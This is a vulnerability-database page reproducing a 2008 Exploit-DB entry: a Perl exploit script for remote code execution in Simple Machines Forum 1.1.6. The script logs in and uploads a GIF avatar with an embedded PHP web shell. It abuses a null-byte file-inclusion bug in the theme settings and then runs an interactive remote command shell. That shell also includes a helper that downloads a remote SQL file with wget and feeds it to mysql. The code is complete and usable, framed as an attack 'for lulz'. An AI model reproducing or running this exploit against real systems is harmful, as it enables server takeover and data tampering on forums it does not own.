Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Simple Machines Forum (SMF) 1.1.6 - Local File Inclusion / Code Execution

🗓️ 05 Nov 2008 00:00:00Reported by ~elmysterioType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 67 Views

Simple Machines Forum (SMF) 1.1.6 Local File Inclusion/C​ode Execution vulnerabilit

Code
#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod. 
#         We can't thank you enough for killing a bug killer. 
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#   
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@win32]$ ver
# 
# Microsoft Windows XP [Version 5.1.2600]
# 
# [cmd@win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = (	s => "",
        		d => 0,
        		x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
        		u => "Gl0ria!!!",
        		p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s"; 

if( !$parms{s} ) {
		die <<HELP
[ii] usage: $0 <parms>
	[-s]    Site        -> http://site.com/forums
	[-x]	Proxy       -> localhost:8118
	[-u]	Username    -> Gl0ria!!!
	[-p]    Password    -> gl0ria\@herb3st
	[-d]    Debug
HELP
}

my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
			chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
			chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00). 
			chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
			chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00); $shell .= <<'EXIF';
<?php 
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit; 
?>
EXIF
			$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
			chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
			chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
			chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
			chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
			chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
			chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
			chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
			chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
			chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
			chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
			chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
			chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
			chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
			chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
			chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
			chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
			chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
			chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
			chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
			chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
			chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
			chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
			chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
			chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
			chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
			chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
			chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
			chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
			chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
			chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
			chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
			chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
			chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
			chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
			chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
			chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
			chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
			chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
			chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
			chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
			chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
			chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
			chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
			chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
			chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
			chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
			chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
			chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
			chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
			chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
			chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
			chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
			chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
			chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
			chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
			chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
			chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
			chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
			chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
			chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
			chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
			chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
			chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
			chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
			chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
			chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
		[
			user			=> $parms{u},
			passwrd			=> $parms{p},
			cookielength	=> -1
		]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
	unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;

die "[!!] Error getting session id\n"
	unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
	unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");

&shell
	if $ret->as_string =~ /expl0ited/;

$ret = $ua->request( 
		POST "$parms{s}/index.php?action=profile2",
		Content_Type	=> 'multipart/form-data',
		Content			=>
		[
			avatar_choice	=> "upload",
			sc				=> $sid,
			userID			=> $id,
			sa				=> "forumProfile",
			attachment		=>
			[
				undef,
				"expl0ited.gif",
				Content         => $shell,
				"Content-Type"	=> "image/gif"
			]
		]);

## Updating Settings.php
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
	my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;

	die "[!!] magic_quotes is turned on\n"
		if (not defined $os or not defined $sh or $1 eq $id);
		
    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";
    
    do {
		print "[$sh\@$os]\$ ";
		$cmd = chomp (my $cmd = <STDIN>);
		

		exit
			unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }
        
        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
        }

        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
	} while( $cmd !~ /^exit$/i );

	exit;
}

# milw0rm.com [2008-11-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Nov 2008 00:00Current
7High risk
Vulners AI Score7
simple machines forumsmf 1.1.6local file inclusioncode executionbugquerystring.phpthemes.phpmagic quoteslulzvulnerabilityperl scripthttp requestuseragentproxyusernamepassworddebugexploit .
67